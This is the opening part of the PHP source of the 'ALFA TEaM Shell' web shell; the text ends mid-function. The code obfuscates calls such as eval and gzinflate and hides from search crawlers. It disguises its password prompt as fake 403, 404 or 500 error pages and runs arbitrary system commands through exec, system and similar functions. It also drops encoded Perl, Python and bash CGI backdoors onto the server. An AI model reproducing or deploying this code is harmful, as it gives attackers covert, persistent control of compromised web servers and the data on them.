AlfaShell.php

1. <?php
2. $GLOBALS['dicgVfFCYw'] = array(
3. 'usCTxaikkLMf' => 'admin',
4. 'panAiZjHasHC' => 'a6f452ec3293d7fb72c5b677257b20ec',
5. 'samKLpRGuwjt' => '0',
6. 'loTLmqLvAVhn' => '403',
7. 'shauNjuXRuqy' => '1',
8. 'poXCjIRapmwy' => true,
9. );
10.  
11. $okUbfUBfEI = 'f'.'unct'.'ion'.'_exi'.'s'.'t'.'s';
12. $EzKSLigWch = 'ch'.'a'.'r'.'Co'.'deA'.'t';
13. $eTxvkUXfZn = 'e'.'v'.'a'.'l';
14. $hmLjSbWMxb = 'gz'.'i'.'n'.'fl'.'a'.'t'.'e';
15. if(!$okUbfUBfEI('b'.'as'.'e64'.'_e'.'nc'.'o'.'d'.'e')){
16. function zkQAzcXYHn($data){
17. if(empty($data)) return;
18. $b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
19. $o1=$o2=$o3=$h1=$h2=$h3=$h4=$bits=$i=0;
20. $ac=0;
21. $enc='';
22. $tmp_arr=array();
23. if (!$data)
24. {
25. return $data;
26. }
27. do
28. {
29. $o1 = $EzKSLigWch($data, $i++);
30. $o2 = $EzKSLigWch($data, $i++);
31. $o3 = $EzKSLigWch($data, $i++);
32. $bits = $o1 << 16 | $o2 << 8 | $o3;
33. $h1 = $bits >> 18 & 0x3f;
34. $h2 = $bits >> 12 & 0x3f;
35. $h3 = $bits >> 6 & 0x3f;
36. $h4 = $bits & 0x3f;
37. $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);
38. }
39. while ($i < strlen($data));
40. $enc = implode($tmp_arr, '');
41. $r = (strlen($data) % 3);
42. return ($r?substr($enc,0,($r-3)):$enc).substr('===',($r||3));
43. }
44. function charCodeAt($data, $char)
45. {
46. return ord(substr($data, $char, 1));
47. }
48. function charAt($data, $char)
49. {
50. return substr($data, $char, 1);
51. }
52. }
53. else
54. {
55. function zkQAzcXYHn($s)
56. {
57. $b='b'.'as'.'e64'.'_e'.'nc'.'o'.'d'.'e';
58. return $b($s);
59. }
60. }
61. if (!$okUbfUBfEI('b' . 'ase' . '64' . '_decode' . ''))
62. {
63. function UWVXTTEgbe($input)
64. {
65. if (empty($input)) return;
66. $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
67. $chr1 = $chr2 = $chr3 = "";
68. $enc1 = $enc2 = $enc3 = $enc4 = "";
69. $i = 0;
70. $output = "";
71. $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
72. do
73. {
74. $enc1 = strpos($keyStr, substr($input, $i++, 1));
75. $enc2 = strpos($keyStr, substr($input, $i++, 1));
76. $enc3 = strpos($keyStr, substr($input, $i++, 1));
77. $enc4 = strpos($keyStr, substr($input, $i++, 1));
78. $chr1 = ($enc1 << 2) | ($enc2 >> 4);
79. $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
80. $chr3 = (($enc3 & 3) << 6) | $enc4;
81. $output = $output . chr((int)$chr1);
82. if ($enc3 != 64)
83. {
84. $output = $output . chr((int)$chr2);
85. }
86. if ($enc4 != 64)
87. {
88. $output = $output . chr((int)$chr3);
89. }
90. $chr1 = $chr2 = $chr3 = "";
91. $enc1 = $enc2 = $enc3 = $enc4 = "";
92. }
93. while ($i < strlen($input));
94. return $output;
95. }
96. }
97. else
98. {
99. function UWVXTTEgbe($s)
100. {
101. $b = 'b' . 'ase' . '64' . '_decode' . '';
102. return $b($s);
103. }
104. }
105.  
106. @session_start();
107. function __ZW5jb2Rlcg($s)
108. {
109. return zkQAzcXYHn($s);
110. }
111. function __ZGVjb2Rlcg($s)
112. {
113. return UWVXTTEgbe($s);
114. }
115. $GLOBALS['DB_NAME'] = $GLOBALS['dicgVfFCYw'];
116. $check = false;
117. if (!isset($_SESSION["alfa_settings_signature"]))
118. {
119. $check = true;
120. }
121. else
122. {
123. if ($_SESSION["alfa_settings_signature"] != md5(print_r($GLOBALS['DB_NAME'], true)))
124. {
125. $check = true;
126. }
127. }
128. if ($check)
129. {
130. $_SESSION["alfa_settings_signature"] = md5(print_r($GLOBALS['DB_NAME'], true));
131. foreach ($GLOBALS['dicgVfFCYw'] as $key => $value)
132. {
133. $prefix = substr($key, 0, 2);
134. if ($prefix == "us")
135. {
136. $GLOBALS['DB_NAME']["user"] = $value;
137. $GLOBALS['DB_NAME']["user_rand"] = $key;
138. }
139. elseif ($prefix == "pa")
140. {
141. $GLOBALS['DB_NAME']["pass"] = $value;
142. $GLOBALS['DB_NAME']["pass_rand"] = $key;
143. }
144. elseif ($prefix == "sa")
145. {
146. $GLOBALS['DB_NAME']["safemode"] = $value;
147. $GLOBALS['DB_NAME']["safemode_rand"] = $key;
148. }
149. elseif ($prefix == "lo")
150. {
151. $GLOBALS['DB_NAME']["login_page"] = $value;
152. $GLOBALS['DB_NAME']["login_page_rand"] = $key;
153. }
154. elseif ($prefix == "sh")
155. {
156. $GLOBALS['DB_NAME']["show_icons"] = $value;
157. $GLOBALS['DB_NAME']["show_icons_rand"] = $key;
158. }
159. elseif ($prefix == "po")
160. {
161. $GLOBALS['DB_NAME']["post_encryption"] = $value;
162. $GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
163. }
164. }
165. $_SESSION["alfa_db_settings"] = $GLOBALS['DB_NAME'];
166. }
167. else
168. {
169. $GLOBALS['DB_NAME'] = $_SESSION["alfa_db_settings"];
170. }
171. unset($GLOBALS['dicgVfFCYw']);
172.  
173. if (!empty($_SERVER['HTTP_USER_AGENT']))
174. {
175. $userAgents = array(
176. "Google",
177. "Slurp",
178. "MSNBot",
179. "ia_archiver",
180. "Yandex",
181. "Rambler",
182. "bot",
183. "spider"
184. );
185. if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
186. {
187. header('HTTP/1.0 404 Not Found');
188. exit;
189. }
190. }
191. if (!isset($GLOBALS['DB_NAME']['user'])) exit('$GLOBALS[\'DB_NAME\'][\'user\']');
192. if (!isset($GLOBALS['DB_NAME']['pass'])) exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
193. if (!isset($GLOBALS['DB_NAME']['safemode'])) exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
194. if (!isset($GLOBALS['DB_NAME']['login_page'])) exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
195. if (!isset($GLOBALS['DB_NAME']['show_icons'])) exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
196. if (!isset($GLOBALS['DB_NAME']['post_encryption'])) exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
197. date_default_timezone_set('Asia/Tehran');
198. define("__ALFA_MD5NAME__", md5($_SERVER["SCRIPT_FILENAME"]));
199. define("__ALFA_VERSION__", "3.0.1");
200. define("__LAST_CWD__", "last_cwd_" . __ALFA_MD5NAME__);
201. define("__PATH_HISTORY__", "path_history_" . __ALFA_MD5NAME__);
202. define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"]) && $GLOBALS["DB_NAME"]["post_encryption"] == true ? true : false));
203. $GLOBALS['__ALFA_COLOR__'] = array(
204. "shell_border" => array(
205. "key_color" => "#0E304A",
206. "multi_selector" => array(
207. ".header" => "border: 7px solid {color}",
208. "#meunlist" => "border-color: {color}",
209. "#hidden_sh" => "background-color: {color}",
210. ".ajaxarea" => "border: 1px solid {color}",
211. ".foot" => "border-color: {color}"
212. )
213. ) ,
214. "header_vars" => "#27979B",
215. "header_values" => "#67ABDF",
216. "header_on" => "#00FF00",
217. "header_off" => "#ff0000",
218. "header_none" => "#00FF00",
219. "home_shell" => "#ff0000",
220. "home_shell:hover" => array(
221. "key_color" => "#FFFFFF",
222. "multi_selector" => array(
223. ".home_shell:hover" => "color: {color};"
224. )
225. ) ,
226. "back_shell" => "#efbe73",
227. "back_shell:hover" => array(
228. "key_color" => "#FFFFFF",
229. "multi_selector" => array(
230. ".back_shell:hover" => "color: {color};"
231. )
232. ) ,
233. "header_pwd" => "#00FF00",
234. "header_pwd:hover" => array(
235. "key_color" => "#FFFFFF",
236. "multi_selector" => array(
237. ".header_pwd:hover" => "color: {color};"
238. )
239. ) ,
240. "header_drive" => "#00FF00",
241. "header_drive:hover" => array(
242. "key_color" => "#FFFFFF",
243. "multi_selector" => array(
244. ".header_drive:hover" => "color: {color};"
245. )
246. ) ,
247. "header_show_all" => "#00FF00",
248. "disable_functions" => "#ff0000",
249. "footer_text" => "#27979B",
250. "menu_options" => "#27979B",
251. "menu_options:hover" => array(
252. "key_color" => "#646464",
253. "multi_selector" => array(
254. ".menu_options:hover" => "background-color: {color};font-weight: unset;"
255. )
256. ) ,
257. "options_list" => array(
258. "key_color" => "#00FF00",
259. "multi_selector" => array(
260. ".ajaxarea .header center a" => "color: {color};"
261. )
262. ) ,
263. "options_list:hover" => array(
264. "key_color" => "#FFFFFF",
265. "multi_selector" => array(
266. ".ajaxarea .header center a:hover" => "color: {color};"
267. )
268. ) ,
269. "options_list_header" => array(
270. "key_color" => "#59cc33",
271. "multi_selector" => array(
272. ".txtfont_header" => "color: {color};"
273. )
274. ) ,
275. "options_list_text" => array(
276. "key_color" => "#FFFFFF",
277. "multi_selector" => array(
278. ".txtfont,.tbltxt" => "color: {color};"
279. )
280. ) ,
281. "Alfa+" => array(
282. "key_color" => "#27E8AE",
283. "multi_selector" => array(
284. ".alfa_plus" => "color: {color};font-weight: unset;"
285. )
286. ) ,
287. "hidden_shell_text" => array(
288. "key_color" => "#00FF00",
289. "multi_selector" => array(
290. "#hidden_sh a" => "color: {color};"
291. )
292. ) ,
293. "hidden_shell_version" => "#ff0000",
294. "shell_name" => "#FF0000",
295. "main_row:hover" => array(
296. "key_color" => "#646464",
297. "multi_selector" => array(
298. ".main tr:hover" => "background-color: {color};"
299. )
300. ) ,
301. "main_header" => array(
302. "key_color" => "#FFFFFF",
303. "multi_selector" => array(
304. ".main th" => "color: {color};"
305. )
306. ) ,
307. "main_name" => array(
308. "key_color" => "#FFFFFF",
309. "multi_selector" => array(
310. ".main .main_name" => "color: {color};font-weight: unset;"
311. )
312. ) ,
313. "main_size" => "#67ABDF",
314. "main_modify" => "#67ABDF",
315. "main_owner_group" => "#67ABDF",
316. "main_green_perm" => "#25ff00",
317. "main_red_perm" => "#FF0000",
318. "main_white_perm" => "#FFFFFF",
319. "beetween_perms" => "#FFFFFF",
320. "main_actions" => array(
321. "key_color" => "#FFFFFF",
322. "multi_selector" => array(
323. ".main .actions" => "color: {color};"
324. )
325. ) ,
326. "menu_options:hover" => array(
327. "key_color" => "#646464",
328. "multi_selector" => array(
329. ".menu_options:hover" => "background-color: {color};font-weight: unset;"
330. )
331. ) ,
332. "minimize_editor_background" => array(
333. "key_color" => "#0e304a",
334. "multi_selector" => array(
335. ".minimized-wrapper" => "background-color: {color};"
336. )
337. ) ,
338. "minimize_editor_text" => array(
339. "key_color" => "#f5deb3",
340. "multi_selector" => array(
341. ".minimized-text" => "color: {color};"
342. )
343. ) ,
344. "editor_border" => array(
345. "key_color" => "#0e304a",
346. "multi_selector" => array(
347. ".editor-explorer,.editor-modal" => "border: 2px solid {color};"
348. )
349. ) ,
350. "editor_background" => array(
351. "key_color" => "rgba(0, 1, 23, 0.94)",
352. "multi_selector" => array(
353. ".editor-explorer,.editor-modal" => "background-color: {color};"
354. )
355. ) ,
356. "editor_header_background" => array(
357. "key_color" => "rgba(21, 66, 88, 0.93)",
358. "multi_selector" => array(
359. ".editor-header" => "background-color: {color};"
360. )
361. ) ,
362. "editor_header_text" => array(
363. "key_color" => "#00ff7f",
364. "multi_selector" => array(
365. ".editor-path" => "color: {color};"
366. )
367. ) ,
368. "editor_header_button" => array(
369. "key_color" => "#1d5673",
370. "multi_selector" => array(
371. ".close-button, .editor-minimize" => "background-color: {color};"
372. )
373. ) ,
374. "editor_actions" => array(
375. "key_color" => "#FFFFFF",
376. "multi_selector" => array(
377. ".editor_actions" => "color: {color};"
378. )
379. ) ,
380. "editor_file_info_vars" => array(
381. "key_color" => "#FFFFFF",
382. "multi_selector" => array(
383. ".editor_file_info_vars" => "color: {color};"
384. )
385. ) ,
386. "editor_file_info_values" => array(
387. "key_color" => "#67ABDF",
388. "multi_selector" => array(
389. ".filestools" => "color: {color};"
390. )
391. ) ,
392. "editor_history_header" => array(
393. "key_color" => "#14ff07",
394. "multi_selector" => array(
395. ".hheader-text,.history-clear" => "color: {color};"
396. )
397. ) ,
398. "editor_history_list" => array(
399. "key_color" => "#03b3a3",
400. "multi_selector" => array(
401. ".editor-file-name" => "color: {color};"
402. )
403. ) ,
404. "editor_history_selected_file" => array(
405. "key_color" => "rgba(49, 55, 93, 0.77)",
406. "multi_selector" => array(
407. ".is_active" => "background-color: {color};"
408. )
409. ) ,
410. "editor_history_file:hover" => array(
411. "key_color" => "#646464",
412. "multi_selector" => array(
413. ".file-holder > .history:hover" => "background-color: {color};"
414. )
415. ) ,
416. "input_box_border" => array(
417. "key_color" => "#0E304A",
418. "multi_selector" => array(
419. "input[type=text],textarea" => "border: 1px solid {color}"
420. )
421. ) ,
422. "input_box_text" => array(
423. "key_color" => "#999999",
424. "multi_selector" => array(
425. "input[type=text],textarea" => "color: {color};"
426. )
427. ) ,
428. "input_box:hover" => array(
429. "key_color" => "#27979B",
430. "multi_selector" => array(
431. "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};"
432. )
433. ) ,
434. "select_box_border" => array(
435. "key_color" => "#0E304A",
436. "multi_selector" => array(
437. "select" => "border: 1px solid {color}"
438. )
439. ) ,
440. "select_box_text" => array(
441. "key_color" => "#FFFFEE",
442. "multi_selector" => array(
443. "select" => "color: {color};"
444. )
445. ) ,
446. "select_box:hover" => array(
447. "key_color" => "#27979B",
448. "multi_selector" => array(
449. "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};"
450. )
451. ) ,
452. "button_border" => array(
453. "key_color" => "#27979B",
454. "multi_selector" => array(
455. "input[type=submit],.button,#addup" => "border: 1px solid {color};"
456. )
457. ) ,
458. "button:hover" => array(
459. "key_color" => "#27979B",
460. "multi_selector" => array(
461. "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
462. ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};"
463. )
464. ) ,
465. "outputs_text" => array(
466. "key_color" => "#67ABDF",
467. "multi_selector" => array(
468. ".ml1" => "color: {color};"
469. )
470. ) ,
471. "outputs_border" => array(
472. "key_color" => "#0E304A",
473. "multi_selector" => array(
474. ".ml1" => "border: 1px solid {color};"
475. )
476. ) ,
477. "uploader_border" => array(
478. "key_color" => "#0E304A",
479. "multi_selector" => array(
480. ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};"
481. )
482. ) ,
483. "uploader_background" => array(
484. "key_color" => "#0E304A",
485. "multi_selector" => array(
486. ".inputfile strong" => "background-color: {color};"
487. )
488. ) ,
489. "uploader_text_right" => array(
490. "key_color" => "#FFFFFF",
491. "multi_selector" => array(
492. ".inputfile strong" => "color: {color};"
493. )
494. ) ,
495. "uploader_text_left" => array(
496. "key_color" => "#25ff00",
497. "multi_selector" => array(
498. ".inputfile span" => "color: {color};"
499. )
500. ) ,
501. "uploader:hover" => array(
502. "key_color" => "#27979B",
503. "multi_selector" => array(
504. ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};"
505. )
506. ) ,
507. "uploader_progress_bar" => array(
508. "key_color" => "#ff0000",
509. "multi_selector" => array(
510. "#up_bar" => "background-color: {color};"
511. )
512. ) ,
513. "mysql_tables" => "#00FF00",
514. "mysql_table_count" => "#67ABDF",
515. "copyright" => "#ff0000",
516. "scrollbar" => array(
517. "key_color" => "#1e82b5",
518. "multi_selector" => array(
519. "*::-webkit-scrollbar-thumb" => "background-color: {color};"
520. )
521. ) ,
522. "scrollbar_background" => array(
523. "key_color" => "#000115",
524. "multi_selector" => array(
525. "*::-webkit-scrollbar-track" => "background-color: {color};"
526. )
527. )
528. );
529. $GLOBALS['__file_path'] = str_replace('\\', '/', trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
530. $config = array(
531. 'AlfaUser' => $GLOBALS['DB_NAME']['user'],
532. 'AlfaPass' => $GLOBALS['DB_NAME']['pass'],
533. 'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],
534. 'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']
535. );
536. @session_start();
537. function alfa_str($LVDCTiHS,$iwizUwc,$dONDSzY){$_FAMI_rtEnNRK="\x63\x68\x72\x62\x69\x6E\x64\x65\x63";$_QI_myqf="\x73\x75\x62\x73\x74\x72";$_aA_HvR=$_QI_myqf($_FAMI_rtEnNRK,$LVDCTiHS,$iwizUwc);return $_aA_HvR($dONDSzY);}
538. if ($config['AlfaProtectShell'])
539. {
540. $SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"]) ? $_SERVER["SERVER_SIGNATURE"] : "");
541. $Eform = '<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
542. if ($config['AlfaLoginPage'] == 'gui')
543. {
544. if (@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass']))
545. {
546. if (@$_POST["usrname"] == $config['AlfaUser'] && @md5($_POST["password"]) == $config['AlfaPass'])
547. {
548. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
549. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
550. @header('location: ' . $_SERVER["PHP_SELF"]);
551. }
552. echo '<style>body{background: black;}#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }#loginbox td { border-radius:5px; font-size:11px; }</style><title>~ ALFA TEaM Shell-v' . __ALFA_VERSION__ . ' ~</title><center><center><img style="border-radius:100px;" width="500" height="250" alt="" src="http://solevisible.com/images/alfa-iran.png" /></center><div id=loginbox><p><font face="verdana,arial" size=-1><center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'><tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v' . __ALFA_VERSION__ . ' ~</b></font></th></tr><tr><td bgcolor="black" style="padding:5"><form method="post"><input type="hidden" name="action" value="login"><input type="hidden" name="hide" value=""><center><table><tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr><tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr><tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table></div><br /></center>';
553. exit;
554. }
555. }
556. elseif ($config['AlfaLoginPage'] == '500')
557. {
558. if (@$_SESSION["AlfaPass"] != @md5($config['AlfaPass']))
559. {
560. if (@md5($_POST["password"]) == $config['AlfaPass'])
561. {
562. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
563. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
564. header('location: ' . $_SERVER["PHP_SELF"]);
565. }
566. echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, ' . $_SERVER['SERVER_ADMIN'] . ' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>' . $SERVER_SIG . '</body></html>' . $Eform;
567. exit;
568. }
569. }
570. elseif ($config['AlfaLoginPage'] == '403')
571. {
572. if (@$_SESSION["AlfaPass"] != @md5($config['AlfaPass']))
573. {
574. if (@md5($_POST["password"]) == $config['AlfaPass'])
575. {
576. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
577. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
578. header('location: ' . $_SERVER["PHP_SELF"]);
579. }
580. echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access " . $_SERVER['PHP_SELF'] . " on this server.</p><hr>" . $SERVER_SIG . "</body></html>" . $Eform;
581. exit;
582. }
583. }
584. elseif ($config['AlfaLoginPage'] == '404')
585. {
586. if (@$_SESSION["AlfaPass"] != @md5($config['AlfaPass']))
587. {
588. if (@md5($_POST["password"]) == $config['AlfaPass'])
589. {
590. @$_SESSION["AlfaUser"] = $config['AlfaUser'];
591. @$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
592. header('location: ' . $_SERVER["PHP_SELF"]);
593. }
594. echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL " . $_SERVER['PHP_SELF'] . " was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>" . $SERVER_SIG . "</body></html>" . $Eform;
595. exit;
596. }
597. }
598. }
599. function decrypt_post($str, $pwd)
600. {
601. if (__ALFA_POST_ENCRYPTION__)
602. {
603. $pwd = __ZW5jb2Rlcg($pwd);
604. $str = __ZGVjb2Rlcg($str);
605. $enc_chr = "";
606. $enc_str = "";
607. $i = 0;
608. while ($i < strlen($str))
609. {
610. for ($j = 0;$j < strlen($pwd);$j++)
611. {
612. $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
613. $enc_str .= $enc_chr;
614. $i++;
615. if ($i >= strlen($str)) break;
616. }
617. }
618. return __ZGVjb2Rlcg($enc_str);
619. }
620. else
621. {
622. return __ZGVjb2Rlcg($str);
623. }
624. }
625. function _AlfaSecretKey()
626. {
627. if (!isset($_SESSION["AlfaSecretKey"]))
628. {
629. @$_SESSION["AlfaSecretKey"] = uniqid(mt_rand() , true);
630. }
631. return $_SESSION["AlfaSecretKey"];
632. }
633. function alfa_getColor($target)
634. {
635. if (isset($GLOBALS["DB_NAME"]["color"][$target]) && $GLOBALS["DB_NAME"]["color"][$target] != "")
636. {
637. return $GLOBALS["DB_NAME"]["color"][$target];
638. }
639. else
640. {
641. $target = $GLOBALS["__ALFA_COLOR__"][$target];
642. if (is_array($target))
643. {
644. return $target["key_color"];
645. }
646. else
647. {
648. return $target;
649. }
650. }
651. }
652. function alfaCssLoadColors()
653. {
654. $css = "";
655. foreach ($GLOBALS['__ALFA_COLOR__'] as $key => $value)
656. {
657. if (!is_array($value))
658. {
659. $value = alfa_getColor($key);
660. $css .= ".{$key}{color: {$value};}";
661. }
662. else
663. {
664. if (isset($value["multi_selector"]))
665. {
666. foreach ($value["multi_selector"] as $k => $v)
667. {
668. $color = alfa_getColor($key);
669. $code = str_replace("{color}", $color, $v);
670. $css .= $k . "{" . $code . "}";
671. }
672. }
673. }
674. }
675. return $css;
676. }
677. function _alfa_cgicmd($cmd, $lang = "perl")
678. {
679. if (isset($_SESSION["alfacgiapi_mode"]))
680. {
681. return "";
682. }
683. $cmd_pure = $cmd;
684. $is_curl = function_exists('curl_version');
685. $is_socket = function_exists('fsockopen');
686. if ($is_curl || $is_socket)
687. {
688. $recreate = false;
689. if (isset($_SESSION["alfacgiapi"]))
690. {
691. if (!@file_exists("alfacgiapi/" . $_SESSION["alfacgiapi"] . ".alfa"))
692. {
693. $recreate = true;
694. $lang = $_SESSION["alfacgiapi"];
695. }
696. }
697. if (!isset($_SESSION["alfacgiapi"]) || $recreate)
698. {
699. @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
700. $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
701. $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
702. $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
703. if ($lang == "perl") $source = $perl;
704. elseif ($lang == "py") $source = $py;
705. else $source = $bash;
706. alfaWriteTocgiapi($lang . ".alfa", $source);
707. alfacgihtaccess('cgi', "alfacgiapi/");
708. }
709. else
710. {
711. $lang = $_SESSION["alfacgiapi"];
712. }
713. $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=" . __ZW5jb2Rlcg("cd " . $GLOBALS['cwd'] . ";" . $cmd);
714. if ($is_curl)
715. {
716. $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://") . $_SERVER["SERVER_NAME"] . dirname($_SERVER["REQUEST_URI"]) . "/alfacgiapi/" . $lang . ".alfa";
717. $post = new AlfaCURL();
718. $data = $post->Send($address, "post", $cmd);
719. }
720. elseif ($is_socket)
721. {
722. $server = $_SERVER["SERVER_NAME"];
723. $uri = dirname($_SERVER["REQUEST_URI"]) . "/alfacgiapi/" . $lang . ".alfa";
724. $data = _alfa_fsockopen($server, $uri, $cmd);
725. }
726. $out = "";
727. if (strstr($data, "[solevisible~api]"))
728. {
729. $_SESSION["alfacgiapi"] = $lang;
730. if (@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res))
731. {
732. $out = $res[1];
733. }
734. }
735. elseif ($lang == "perl")
736. {
737. return _alfa_cgicmd($cmd_pure, "py");
738. }
739. elseif ($lang == "py")
740. {
741. return _alfa_cgicmd($cmd_pure, "bash");
742. }
743. else
744. {
745. $_SESSION["alfacgiapi_mode"] = "off";
746. }
747. return trim($out);
748. }
749. else
750. {
751. return "";
752. }
753. }
754. function alfaEx($in, $re = false, $cgi = true, $all = false)
755. {
756. $data = _alfa_php_cmd($in, $re);
757. if (empty($data) && $cgi || $all)
758. {
759. if ($GLOBALS['sys'] == 'unix')
760. {
761. if (strlen(_alfa_php_cmd("whoami")) == 0 || $all)
762. {
763. $cmd = _alfa_cgicmd($in);
764. if (!empty($cmd))
765. {
766. return $cmd;
767. }
768. }
769. }
770. }
771. return $data;
772. }
773. function _alfa_php_cmd($in, $re = false)
774. {
775. $out = '';
776. try
777. {
778. if ($re) $in = $in . " 2>&1";
779. if (function_exists('exec'))
780. {
781. @exec($in, $out);
782. $out = @join("\n", $out);
783. }
784. elseif (function_exists('passthru'))
785. {
786. ob_start();
787. @passthru($in);
788. $out = ob_get_clean();
789. }
790. elseif (function_exists('system'))
791. {
792. ob_start();
793. @system($in);
794. $out = ob_get_clean();
795. }
796. elseif (function_exists('shell_exec'))
797. {
798. $out = shell_exec($in);
799. }
800. elseif (function_exists("popen") && function_exists("pclose"))
801. {
802. if (is_resource($f = @popen($in, "r")))
803. {
804. $out = "";
805. while (!@feof($f)) $out .= fread($f, 1024);
806. pclose($f);
807. }
808. }
809. elseif (function_exists('proc_open'))
810. {
